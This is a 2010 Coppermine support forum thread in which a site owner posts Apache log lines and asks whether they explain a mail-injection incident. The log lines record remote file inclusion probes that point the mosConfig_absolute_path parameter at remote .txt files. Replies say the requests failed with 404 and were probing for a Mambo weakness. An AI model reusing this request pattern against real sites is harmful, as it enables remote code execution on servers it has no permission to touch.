Advanced search  

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Pages: [1]   Go Down

Author Topic: Hacking Attempt??  (Read 4477 times)

0 Members and 1 Guest are viewing this topic.

Kymmy

  • Coppermine newbie
  • Offline Offline
  • Posts: 12
Hacking Attempt??
« on: January 02, 2010, 04:05:41 pm »

Just had a load of direct mail entries from my apache (20,000+) and just looked through all my web logs.. Only thing strange I could find about the same time was this

Code: [Select]
187.4.5.250 - - [02/Jan/2010:09:21:51 +0000] "GET /cpg//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
187.4.5.250 - - [02/Jan/2010:09:21:51 +0000] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 303 "-" "Mozilla/5.0"

and

Code: [Select]
61.47.7.71 - - [02/Jan/2010:09:14:44 +0000] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
61.47.7.71 - - [02/Jan/2010:09:14:44 +0000] "GET /cpg//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 308 "-" "Mozilla/5.0"

Is this a problem with coppermine? and could this have caused the mail injection?

System details are as follows
Coppermine = 1.4.25 (stable) (bridged on phpbb3.5)
php = 5.2.11
Mysql = 5.0.86
Server = Centos 5.4
Logged

Nibbler

  • Guest
Re: Hacking Attempt??
« Reply #1 on: January 02, 2010, 05:37:16 pm »

They are all 404 - nothing happened.
Logged

Kymmy

  • Coppermine newbie
  • Offline Offline
  • Posts: 12
Re: Hacking Attempt??
« Reply #2 on: January 02, 2010, 07:51:51 pm »

They are all 404 - nothing happened.

 ???  Off I go looking elsewhere then, something has let it in..  ThanX for the quick answer
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Hacking Attempt??
« Reply #3 on: January 03, 2010, 12:20:48 am »

Looks like someone is probing for a Mambo weakness as far as I can see.
Logged
Pages: [1]   Go Up
 

Page created in 0.023 seconds with 20 queries.